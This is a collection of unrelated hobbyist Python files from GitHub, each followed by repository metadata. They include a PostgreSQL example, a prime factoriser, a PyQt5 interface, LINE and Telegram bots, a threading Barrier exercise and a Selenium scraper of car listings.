cursor.execute(insert, n) connection.commit() except (Exception, psycopg2.Error) as error: print("Error inserting names", error) finally: cursor.close() def insert_booking(connection, name, surname, course): cursor = connection.cursor() try: cursor.execute("SELECT ID FROM students WHERE NAME=%s AND SURNAME=%s", (name, surname)) student_id = cursor.fetchone()[0] cursor.execute("SELECT ID FROM courses WHERE NAME = %s ", (course,)) course_id = cursor.fetchone()[0] cursor.execute("INSERT INTO booking (STUDENT_ID,COURSE_ID) VALUES (%s,%s)", (str(student_id), str(course_id))) connection.commit() except (Exception, psycopg2.Error) as error: print("Error inserting bookings", error) finally: cursor.close() def delate_names(connetion): cursor = connection.cursor() try: cursor.execute("DELETE FROM students where name='Roberta' ") connection.commit() except (Exception, psycopg2.Error) as error: print("Error deleting name", error) finally: cursor.close() def drop_tables(connetion): cursor = connection.cursor() try: cursor.execute("DROP TABLE booking ") cursor.execute("DROP TABLE students ") cursor.execute("DROP TABLE courses ") connection.commit() except (Exception, psycopg2.Error) as error: print("Error deleting name", error) finally: cursor.close() if __name__ == '__main__': print("esempi sql") try: # apro la connessione connection = psycopg2.connect(user="postgres", password="password", host="127.0.0.1", port="5432", database="sample") #drop_tables(connection) create_table(connection) insert_names(connection) insert_courses(connection) insert_booking(connection, "Marco", "Torlaschi", "SQL") insert_booking(connection, "Marco", "Torlaschi", "SPRING") insert_booking(connection, "Roberta", "Latini", "SPRING") cursor = connection.cursor() cursor.execute("SELECT * FROM students,booking,courses WHERE students.ID=booking.STUDENT_ID AND courses.ID=booking.COURSE_ID") riga = cursor.fetchall() print(riga) drop_tables(connection) except (Exception, psycopg2.Error) as error: # catcho l'errore in connessione print("Error while connecting to PostgreSQL", error) finally: # chiudo la connessione in finally per essere sicuro che avvenga sempre if (connection): connection.close() print("PostgreSQL connection is closed")
Torla/postgres_ex
main.py
main.py
py
5,031
python
en
code
0
github-code
36
1947598630
import util primes = [2, 3] d_sum = [0] def init(n): i = primes[-1] while i < n: i += 2 for num in primes: if num * num > i: primes.append(i) break if i % num == 0: break def decompose(n): init(n) fac = {} i = 0 while n > 1: if n % primes[i] == 0: n = int(n / primes[i]) if primes[i] in fac: fac[primes[i]] += 1 else: fac[primes[i]] = 1 elif primes[i] * primes[i] > n: fac[n] = 1 break else: i += 1 return fac # for i in range(2, 100): # decompose(i) # print(decom[28]) # init(100) # init(1000001) # print(primes) # print(decompose(480)) # print(decompose(960))
liligeng111/Euler_Python
prime.py
prime.py
py
629
python
en
code
1
github-code
36
35701573370
from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(899, 563) MainWindow.setMinimumSize(QtCore.QSize(700, 480)) MainWindow.setStyleSheet("*{\n" "background:#18162A;\n" "border:none;\n" "color:white;\n" "}") self.centralwidget = QtWidgets.QWidget(MainWindow) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.centralwidget.sizePolicy().hasHeightForWidth()) self.centralwidget.setSizePolicy(sizePolicy) self.centralwidget.setObjectName("centralwidget") self.hboxlayout = QtWidgets.QHBoxLayout(self.centralwidget) self.hboxlayout.setContentsMargins(0, 0, 0, 0) self.hboxlayout.setSpacing(0) self.hboxlayout.setObjectName("hboxlayout") self.leftMenu = QtWidgets.QFrame(self.centralwidget) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.leftMenu.sizePolicy().hasHeightForWidth()) self.leftMenu.setSizePolicy(sizePolicy) self.leftMenu.setMinimumSize(QtCore.QSize(200, 0)) self.leftMenu.setMaximumSize(QtCore.QSize(0, 16777215)) self.leftMenu.setStyleSheet("background:#060117; border:none;") self.leftMenu.setFrameShape(QtWidgets.QFrame.StyledPanel) self.leftMenu.setFrameShadow(QtWidgets.QFrame.Raised) self.leftMenu.setLineWidth(0) self.leftMenu.setObjectName("leftMenu") self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.leftMenu) self.verticalLayout_2.setContentsMargins(0, 0, 0, 0) self.verticalLayout_2.setSpacing(0) self.verticalLayout_2.setObjectName("verticalLayout_2") self.frame_4 = QtWidgets.QFrame(self.leftMenu) self.frame_4.setMinimumSize(QtCore.QSize(0, 50)) self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_4.setObjectName("frame_4") self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.frame_4) self.verticalLayout_3.setObjectName("verticalLayout_3") self.dvsoft = QtWidgets.QPushButton(self.frame_4) self.dvsoft.setText("DVsoft") self.dvsoft.setObjectName("pushButton_9") self.dvsoft.setStyleSheet("font-size:32px;") self.verticalLayout_3.addWidget(self.dvsoft, 0, QtCore.Qt.AlignLeft) self.verticalLayout_2.addWidget(self.frame_4, 0, QtCore.Qt.AlignTop) self.frame_5 = QtWidgets.QFrame(self.leftMenu) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.frame_5.sizePolicy().hasHeightForWidth()) self.frame_5.setSizePolicy(sizePolicy) self.frame_5.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_5.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_5.setObjectName("frame_5") self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.frame_5) self.verticalLayout_4.setContentsMargins(0, 0, 0, 0) self.verticalLayout_4.setSpacing(0) self.verticalLayout_4.setObjectName("verticalLayout_4") self.Menu2 = QtWidgets.QToolBox(self.frame_5) self.Menu2.setStyleSheet("QToolBox{\n" " background-color:rgb(24,24,36);\n" " text-align:left;\n" " font-size:20px;\n" " color:white;\n" "}\n" "QToolBox::tab{\n" " border-radius:5px;\n" " background-color:rgb(17,16,26);\n" " text-align:left;\n" " font-size:20px;\n" " color:white;\n" "}") self.Menu2.setObjectName("Menu2") self.Menu1 = QtWidgets.QWidget() self.Menu1.setGeometry(QtCore.QRect(0, 0, 200, 357)) self.Menu1.setStyleSheet("") self.Menu1.setObjectName("Menu1") self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.Menu1) self.verticalLayout_5.setObjectName("verticalLayout_5") self.frame_7 = QtWidgets.QFrame(self.Menu1) self.frame_7.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_7.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_7.setObjectName("frame_7") self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.frame_7) self.verticalLayout_6.setContentsMargins(0, 0, 0, 0) self.verticalLayout_6.setSpacing(10) self.verticalLayout_6.setObjectName("verticalLayout_6") self.pushButton = QtWidgets.QPushButton(self.frame_7) self.pushButton.setStyleSheet("font-size:20px") self.pushButton.setObjectName("pushButton") self.verticalLayout_6.addWidget(self.pushButton) self.pushButton_2 = QtWidgets.QPushButton(self.frame_7) self.pushButton_2.setStyleSheet("font-size:20px") self.pushButton_2.setObjectName("pushButton_2") self.verticalLayout_6.addWidget(self.pushButton_2) self.pushButton_3 = QtWidgets.QPushButton(self.frame_7) self.pushButton_3.setStyleSheet("font-size:20px") self.pushButton_3.setObjectName("pushButton_3") self.verticalLayout_6.addWidget(self.pushButton_3) self.verticalLayout_5.addWidget(self.frame_7, 0, QtCore.Qt.AlignTop) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap("icons/strelka3.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.Menu2.addItem(self.Menu1, icon, "") self.menu2 = QtWidgets.QWidget() self.menu2.setGeometry(QtCore.QRect(0, 0, 200, 357)) self.menu2.setObjectName("menu2") self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.menu2) self.verticalLayout_7.setObjectName("verticalLayout_7") self.frame_8 = QtWidgets.QFrame(self.menu2) self.frame_8.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_8.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_8.setObjectName("frame_8") self.verticalLayout_8 = QtWidgets.QVBoxLayout(self.frame_8) self.verticalLayout_8.setContentsMargins(0, 0, 0, 0) self.verticalLayout_8.setSpacing(15) self.verticalLayout_8.setObjectName("verticalLayout_8") self.pushButton_4 = QtWidgets.QPushButton(self.frame_8) self.pushButton_4.setStyleSheet("font-size:20px;") self.pushButton_4.setObjectName("pushButton_4") self.verticalLayout_8.addWidget(self.pushButton_4) self.pushButton_5 = QtWidgets.QPushButton(self.frame_8) self.pushButton_5.setStyleSheet("font-size:20px") self.pushButton_5.setObjectName("pushButton_5") self.verticalLayout_8.addWidget(self.pushButton_5) self.label_2 = QtWidgets.QLabel(self.frame_8) self.label_2.setStyleSheet("font-size:20px;") self.label_2.setWordWrap(True) self.label_2.setObjectName("label_2") self.verticalLayout_8.addWidget(self.label_2) self.verticalLayout_7.addWidget(self.frame_8) self.Menu2.addItem(self.menu2, icon, "") self.verticalLayout_4.addWidget(self.Menu2) self.verticalLayout_2.addWidget(self.frame_5) self.frame_6 = QtWidgets.QFrame(self.leftMenu) self.frame_6.setMinimumSize(QtCore.QSize(0, 50)) self.frame_6.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_6.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_6.setObjectName("frame_6") self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.frame_6) self.horizontalLayout_8.setObjectName("horizontalLayout_8") self.exit = QtWidgets.QPushButton(self.frame_6) self.exit.setStyleSheet("font-size:20px;") icon1 = QtGui.QIcon() icon1.addPixmap(QtGui.QPixmap("icons/выход.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.exit.setIcon(icon1) self.exit.setObjectName("pushButton_12") self.horizontalLayout_8.addWidget(self.exit, 0, QtCore.Qt.AlignLeft) self.verticalLayout_2.addWidget(self.frame_6) self.hboxlayout.addWidget(self.leftMenu) self.MainFrame = QtWidgets.QFrame(self.centralwidget) self.MainFrame.setStyleSheet("border:none;") self.MainFrame.setFrameShape(QtWidgets.QFrame.StyledPanel) self.MainFrame.setFrameShadow(QtWidgets.QFrame.Raised) self.MainFrame.setObjectName("MainFrame") self.verticalLayout = QtWidgets.QVBoxLayout(self.MainFrame) self.verticalLayout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.setSpacing(0) self.verticalLayout.setObjectName("verticalLayout") self.header = QtWidgets.QFrame(self.MainFrame) self.header.setMinimumSize(QtCore.QSize(0, 50)) self.header.setStyleSheet("background:#060117; border:none;") self.header.setFrameShape(QtWidgets.QFrame.StyledPanel) self.header.setFrameShadow(QtWidgets.QFrame.Raised) self.header.setLineWidth(0) self.header.setObjectName("header") self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.header) self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.frame = QtWidgets.QFrame(self.header) self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame.setFrameShadow(QtWidgets.QFrame.Raised) self.frame.setObjectName("frame") self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame) self.horizontalLayout.setContentsMargins(0, 0, 0, 0) self.horizontalLayout.setSpacing(0) self.horizontalLayout.setObjectName("horizontalLayout") self.menuTurn = QtWidgets.QPushButton(self.frame) self.menuTurn.setText("") icon2 = QtGui.QIcon() icon2.addPixmap(QtGui.QPixmap("icons/свернуть бар.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.menuTurn.setIcon(icon2) self.menuTurn.setIconSize(QtCore.QSize(32, 32)) self.menuTurn.setObjectName("pushButton_11") self.horizontalLayout.addWidget(self.menuTurn) self.lineEdit = QtWidgets.QLineEdit(self.frame) self.lineEdit.setStyleSheet("border-bottom:2px solid #19E67E;\n" "font-size:24px;") self.lineEdit.setObjectName("lineEdit") self.horizontalLayout.addWidget(self.lineEdit) self.pushButton_10 = QtWidgets.QPushButton(self.frame) self.pushButton_10.setText("") icon3 = QtGui.QIcon() icon3.addPixmap(QtGui.QPixmap("icons/search.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.pushButton_10.setIcon(icon3) self.pushButton_10.setIconSize(QtCore.QSize(32, 32)) self.pushButton_10.setObjectName("pushButton_10") self.horizontalLayout.addWidget(self.pushButton_10) self.horizontalLayout_2.addWidget(self.frame, 0, QtCore.Qt.AlignLeft) self.frame_2 = QtWidgets.QFrame(self.header) self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_2.setObjectName("frame_2") self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.frame_2) self.horizontalLayout_4.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_4.setSpacing(0) self.horizontalLayout_4.setObjectName("horizontalLayout_4") self.username = QtWidgets.QPushButton(self.frame_2) self.username.setText("USERNAME") icon4 = QtGui.QIcon() icon4.addPixmap(QtGui.QPixmap("icons/пользователь.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.username.setIcon(icon4) self.username.setIconSize(QtCore.QSize(32, 32)) self.username.setObjectName("pushButton_9") self.username.setStyleSheet("font-size:24px;") self.horizontalLayout_4.addWidget(self.username, 0, QtCore.Qt.AlignLeft) self.horizontalLayout_2.addWidget(self.frame_2, 0, QtCore.Qt.AlignHCenter) self.frame_3 = QtWidgets.QFrame(self.header) self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_3.setObjectName("frame_3") self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.frame_3) self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_3.setSpacing(0) self.horizontalLayout_3.setObjectName("horizontalLayout_3") self.turn = QtWidgets.QPushButton(self.frame_3) self.turn.setText("") icon5 = QtGui.QIcon() icon5.addPixmap(QtGui.QPixmap("icons/свернуть.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.turn.setIcon(icon5) self.turn.setIconSize(QtCore.QSize(45, 45)) self.turn.setObjectName("pushButton_6") self.horizontalLayout_3.addWidget(self.turn) self.expand = QtWidgets.QPushButton(self.frame_3) self.expand.setText("") icon6 = QtGui.QIcon() icon6.addPixmap(QtGui.QPixmap("icons/двойная диагональная стрелка.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.expand.setIcon(icon6) self.expand.setIconSize(QtCore.QSize(30, 40)) self.expand.setObjectName("pushButton_7") self.horizontalLayout_3.addWidget(self.expand) self.close = QtWidgets.QPushButton(self.frame_3) self.close.setText("") icon7 = QtGui.QIcon() icon7.addPixmap(QtGui.QPixmap("icons/x.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.close.setIcon(icon7) self.close.setIconSize(QtCore.QSize(40, 40)) self.close.setObjectName("pushButton_8") self.horizontalLayout_3.addWidget(self.close) self.horizontalLayout_2.addWidget(self.frame_3, 0, QtCore.Qt.AlignRight) self.verticalLayout.addWidget(self.header) self.main = QtWidgets.QFrame(self.MainFrame) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.main.sizePolicy().hasHeightForWidth()) self.main.setSizePolicy(sizePolicy) font = QtGui.QFont() font.setStyleStrategy(QtGui.QFont.PreferDefault) self.main.setFont(font) self.main.setAutoFillBackground(False) self.main.setFrameShape(QtWidgets.QFrame.StyledPanel) self.main.setFrameShadow(QtWidgets.QFrame.Raised) self.main.setObjectName("main") self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.main) self.verticalLayout_9.setObjectName("verticalLayout_9") self.label_5 = QtWidgets.QLabel(self.main) self.label_5.setStyleSheet("border:10px solid #19E67E;\n" "border-radius:90px;\n" "padding: 15px") self.label_5.setText("") self.label_5.setPixmap(QtGui.QPixmap("icons/логотип.svg")) self.label_5.setObjectName("label_5") self.verticalLayout_9.addWidget(self.label_5, 0, QtCore.Qt.AlignHCenter|QtCore.Qt.AlignBottom) self.label_6 = QtWidgets.QLabel(self.main) self.label_6.setStyleSheet("font-size:50px;") self.label_6.setObjectName("label_6") self.verticalLayout_9.addWidget(self.label_6, 0, QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop) self.verticalLayout.addWidget(self.main) self.footer = QtWidgets.QFrame(self.MainFrame) self.footer.setMinimumSize(QtCore.QSize(50, 50)) self.footer.setFrameShape(QtWidgets.QFrame.StyledPanel) self.footer.setFrameShadow(QtWidgets.QFrame.Raised) self.footer.setObjectName("footer") self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.footer) self.horizontalLayout_5.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_5.setSpacing(0) self.horizontalLayout_5.setObjectName("horizontalLayout_5") self.frame_10 = QtWidgets.QFrame(self.footer) self.frame_10.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_10.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_10.setObjectName("frame_10") self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.frame_10) self.horizontalLayout_6.setObjectName("horizontalLayout_6") self.label_4 = QtWidgets.QLabel(self.frame_10) self.label_4.setStyleSheet("font-size:14px;\n" "") self.label_4.setObjectName("label_4") self.horizontalLayout_6.addWidget(self.label_4, 0, QtCore.Qt.AlignLeft|QtCore.Qt.AlignBottom) self.horizontalLayout_5.addWidget(self.frame_10, 0, QtCore.Qt.AlignLeft) self.frame_9 = QtWidgets.QFrame(self.footer) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.frame_9.sizePolicy().hasHeightForWidth()) self.frame_9.setSizePolicy(sizePolicy) self.frame_9.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_9.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_9.setObjectName("frame_9") self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.frame_9) self.horizontalLayout_7.setObjectName("horizontalLayout_7") self.horizontalLayout_5.addWidget(self.frame_9) self.verticalLayout.addWidget(self.footer) self.hboxlayout.addWidget(self.MainFrame) MainWindow.setCentralWidget(self.centralwidget) self.retranslateUi(MainWindow) self.Menu2.setCurrentIndex(1) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) self.dvsoft.setText(_translate("MainWindow", "DVsoft")) self.pushButton.setText(_translate("MainWindow", "Item1")) self.pushButton_2.setText(_translate("MainWindow", "Item2")) self.pushButton_3.setText(_translate("MainWindow", "Item3")) self.Menu2.setItemText(self.Menu2.indexOf(self.Menu1), _translate("MainWindow", "Menu1")) self.pushButton_4.setText(_translate("MainWindow", "Weather")) self.pushButton_5.setText(_translate("MainWindow", "Course Dollar/Euro")) self.label_2.setText(_translate("MainWindow", "Больше информации вы можете прочеcть на нашем сайте, который ещё не готов :)")) self.Menu2.setItemText(self.Menu2.indexOf(self.menu2), _translate("MainWindow", "Menu2")) self.exit.setText(_translate("MainWindow", "Exit")) self.lineEdit.setText(_translate("MainWindow", "Search")) self.label_6.setText(_translate("MainWindow", "DVsoft")) self.label_4.setText(_translate("MainWindow", "DVsoft.project.1")) import icons_rc
MyLongCode/project1
ui_interface.py
ui_interface.py
py
19,084
python
en
code
0
github-code
36
15381149189
import requests from weather_message import WeatherStation LINE_URL = 'https://notify-api.line.me/api/notify' def send_message(token, msg): headers = {'Authorization': 'Bearer ' + token} payload = {'message': msg} response = requests.post(LINE_URL, headers=headers, params=payload) return response.status_code def main(): line_token = 'your_line_token' # 你的line權杖 msg = '' status_code = send_message(line_token, msg) print(status_code) if __name__ == '__main__': main()
shamiOuO/weather_report
Line_notify.py
Line_notify.py
py
544
python
en
code
0
github-code
36
21123419493
from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import Column, Integer, Text, TIMESTAMP from sqlalchemy import func Base = declarative_base() class TestData(Base): __tablename__ = 'test' id = Column(Integer, primary_key = True) data = Column(Text) created_at = Column(TIMESTAMP, server_default = func.sysdate()) updated_at = Column(TIMESTAMP, server_default = func.sysdate())
tosiaki/windyfall_bot
testdata.py
testdata.py
py
423
python
en
code
0
github-code
36
34341824103
# -*- coding: utf-8 -*- from telegram.ext import Updater from telegram.ext import CommandHandler from telegram.ext import MessageHandler, Filters from telegram.ext.dispatcher import run_async from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, KeyboardButton import telegram from emoji import emojize, demojize from commands import * from commands.libs.decorators import commands, descriptions from commands.libs.history import add_history from commands.general import cmd_start from settings import * from tools.text import analyze_text from tools.libs import * from shared import save_data, clean_data import random, logging, os, sys, atexit, threading # Set up basic logging logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) @atexit.register def final_handler(): print("Stop") # Gestion des taches planifié # bot = telegram.Bot(token=token) # def doAction(): # bot.sendMessage(chat_id="TODO", text="Test") # threading.Timer(60, doAction).start() # doAction() @run_async def start(bot, update, args): # Sauvegarde de l’id du nouveau client. attrs = make_attrs_from_telegram(update, bot, args, {}) cmd_start(attrs) @run_async def commands_handler(bot, update, args, no_fail_reply=False, attrs=None): try: if not attrs: attrs = make_attrs_from_telegram(update, bot, args, {}) else: bot = attrs["telegram"]["bot"] update = attrs["telegram"]["update"] args = attrs["telegram"]["args"] commande = get_probable_command(update.message.text, bot.name) # Si c’est en mode « Salon », alors l’historique est enregistré # pour le salon sinon c’est pour le pseudo de l’utilisateur if commande: add_history(pseudo=username_or_channel(attrs), command="{0} {1}".format(commande, attrs["query"])) else: add_history(pseudo=username_or_channel(attrs), command=update.message.text) if commande in commands: if no_fail_reply == False: # Si pas de réponse en cas d’erreur, on indique jamais que laurence écrit bot.sendChatAction(chat_id=update.message.chat_id, action="typing") # Execution de la commande en question retour = commands[commande](attrs) # Réponse if retour != "" and retour is not None: if type(retour) is not str: retour = " ".join(retour) retour = emojize(retour) bot.sendMessage(chat_id=update.message.chat_id, text=retour, reply_markup=ReplyKeyboardRemove(), parse_mode="Markdown") # update.message.reply_text(retour, reply_markup=ReplyKeyboardRemove()) elif no_fail_reply == False: # Cas d’erreur uniquement si on est dans le cas ou l’on doit pas répondre en cas d’erreur update.message.reply_text( "Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide", reply_markup=ReplyKeyboardRemove()) except Exception as e: print(e) import traceback traceback.print_exc() @run_async def text_handler(bot, update): update.message.text = update.message.text.replace(bot.name, "").lstrip() attrs = analyze_text(bot, update, do_google_search=is_private_channel(update)) commands_handler(None, None, None, True, attrs=attrs) @run_async def location_handler(bot, update): args = update.message.text.split(' ') update.message.text = "/proche" commands_handler(bot, update, args[1:], no_fail_reply=True) @run_async def voice_handler(bot, update): update.message.reply_text( emojize("Très jolie voix ! Mais je ne comprend pas encore la parole :cry:.", use_aliases=True), reply_markup=ReplyKeyboardRemove()) def unknown_handler(bot, update): update.message.reply_text( "Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide", reply_markup=ReplyKeyboardRemove()) def register_slash_commands(): for command in commands: dispatcher.add_handler(CommandHandler(command, commands_handler, pass_args=True)) def error(bot, update, error): logging.warn('Update "%s" caused error "%s"' % (update, error)) if __name__ == '__main__': token = os.getenv('LAURENCE_TOKEN') if not token: logging.critical('Token absent') sys.exit() updater = Updater(token=token) dispatcher = updater.dispatcher dispatcher.add_handler(CommandHandler('start', start, pass_args=True)) register_slash_commands() # Gestion du text comme commande (Temporaire) dispatcher.add_handler(MessageHandler(Filters.text, text_handler)) # Gestion des envois type « position » dispatcher.add_handler(MessageHandler(Filters.location, location_handler)) # Gestion des envois type « Voice » dispatcher.add_handler(MessageHandler(Filters.voice, voice_handler)) # log all errors dispatcher.add_error_handler(error) print("Laurence is ready.") updater.start_polling()
c4software/laurence-bot
telegram_start.py
telegram_start.py
py
5,247
python
en
code
1
github-code
36
25175834547
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sun Apr 2 17:19:48 2023 @author: acomeau """ import matplotlib.pyplot as plt import time import numpy as np import math x=np.zeros((1,100)) x1=np.zeros((1,100)) x2=np.zeros((1,100)) for timeSetepNdx in range(1,100): x[0,timeSetepNdx]=timeSetepNdx x1[0,timeSetepNdx]=math.cos(timeSetepNdx*2*math.pi/100.0) x2[0,timeSetepNdx]=math.sin(timeSetepNdx*2*math.pi/100.0) plt.figure() plt.subplot(211) plt.plot(x,x1,'k-.') plt.plot(x,x2,'k-.') plt.xlabel('Sample') plt.ylabel('x,y') plt.subplot(212) plt.plot(x1,x2,'k-.') plt.axes('square') plt.xlabel('x1') plt.ylabel('y1') plt.show() time.sleep(0.1)
adriencomeau/Telescopium
untitled1.py
untitled1.py
py
749
python
en
code
0
github-code
36
9742849940
import random , math, time from threading import Barrier, Thread # A barrier for 5 thraeds barrier = Barrier(5) start_time = math.floor(time.perf_counter()) # person_in_mall is target of threads created to represent persons def person_in_mall(name, arrival, visit): # sleep for 'arrival' amount of time , which represents the arrival time of a person in mall time.sleep(arrival) # print as the person reached the mall . current_time = math.floor(time.perf_counter()) - start_time # Current time print('Time '+format(current_time)+'s : '+name +' reached the mall\n',end='') # wait for other threads or person to enter mall . All persons enters the mall at the same time barrier.wait() # as the barrier breaks , all 5 persons enters the mall at the same time . current_time = math.floor(time.perf_counter()) - start_time # Current time print('Time '+format(current_time)+'s : '+name +' enters the mall\n',end='') # sleep for 'visit' amount of time , which represents the visit time of a person in the mall time.sleep(visit) # after visiting done, the person leaves the mall . current_time = math.floor(time.perf_counter()) - start_time # Current time print('Time '+format(current_time)+'s : '+name +' leaves the mall\n',end='') # arr is the list of threads arr=[] # create 5 threads for i in range(5): # arrival represents the arrival time of the Person or thread arrival = random.uniform(1,20) # visit represents the amount of time a person will visit in mall visit = random.uniform(1,10) # name represents the name of the person name = "Person "+format(i+1) # create thread with target to person_in_mall and arguments name, arrival , visit t = Thread(target= person_in_mall , args=[name , arrival,visit]) # append threads in arr list arr.append(t) # start all threads in arr for t in arr: t.start()
nilanjana123/Programming_lab
lab4/Q4.py
Q4.py
py
2,038
python
en
code
1
github-code
36
70506020904
#importing libraries import pandas as pd from selenium import webdriver # for webdriver from selenium.common.exceptions import NoSuchElementException # for exception handling import time # for delay # setting platform for selenium path = r'C:\Users\haqab\Desktop\DS\chromedriver.exe' driver = webdriver.Chrome(path) # url driver.get('https://www.olx.in/cars_c84') # setting arrays for data. links = [] URL = [] Company_name = [] prices = [] Location = [] Model = [] Variant = [] Year = [] Fuel = [] Transmission = [] Mileage = [] No_owner = [] #main state wise url links for i in pages: driver.get(i) for j in range(1,15): try: time.sleep(1) # for clicking load more botton load_more = driver.find_element_by_xpath('//*[@class="rui-3sH3b rui-3K5JC rui-1zK8h"]') load_more.click() # escaping errors except NoSuchElementException: pass # car links # main links of cars to scrape. posts = driver.find_elements_by_xpath('//*[@class = "EIR5N"]/a') links = [elem.get_attribute('href') for elem in posts] # checking the output #print(len(links)) # individual cars url main scraping process.. for i in links: driver.get(i) try: url = driver.find_element_by_xpath('//*[@rel = "alternate"]') #print(url.get_attribute('href')) URL.append(url.get_attribute('href')) name = driver.find_element_by_xpath('//*[@data-aut-id = "value_make"]').text #print(name) Company_name.append(name) price = driver.find_element_by_xpath('//*[@class="_18gRm"]').text #print(price) prices.append(price) local = driver.find_element_by_xpath('//*[@class="_2FRXm"]').text #print(local) Location.append(local.split(',')[2]) model = driver.find_element_by_xpath('//*[@data-aut-id = "value_model"]').text #print(model) Model.append(model) variant = driver.find_element_by_xpath('//*[@data-aut-id = "value_variant"]').text #print(variant) Variant.append(variant) year = driver.find_element_by_xpath('//*[@data-aut-id = "value_year"]').text #print(year) Year.append(year) fuel = driver.find_element_by_xpath('//*[@data-aut-id = "value_petrol"]').text #print(fuel) Fuel.append(fuel) transmission = driver.find_element_by_xpath('//*[@data-aut-id = "value_transmission"]').text #print(transmission) Transmission.append(transmission) mileage = driver.find_element_by_xpath('//*[@data-aut-id = "value_mileage"]').text #print(mileage) Mileage.append(mileage) no_owner = driver.find_element_by_xpath('//*[@data-aut-id = "value_first_owner"]').text #print(no_owner) No_owner.append(no_owner) except NoSuchElementException: pass #print('One state complete') #print(len(links)) # The complete output # conveting into dict.. dictt = { 'URL' : URL, 'Company_name' : Company_name, 'prices' : prices, 'Loctaion' : Location, 'Model' : Model, 'Varient' : Variant, 'Year' : Year, 'Fuel' : Fuel, 'Transmission' : Transmission, 'Mileage' : Mileage, 'No_owner' : No_owner } dictt # saving to data frame using pandas df2 = pd.DataFrame.from_dict(dictt, orient = 'index') df2 = df.transpose() # output file df.to_csv('output.csv')
Abdulhaq005/Web-Scraping-scrapy-and-selenium-
cars/spiders/selenium_script.py
selenium_script.py
py
3,645
python
en
code
0
github-code
36
72177063783
